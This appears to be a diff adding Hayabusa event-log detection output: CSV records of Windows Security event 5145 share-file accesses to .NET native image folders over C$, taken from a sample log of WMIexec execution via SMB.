+2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Temp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
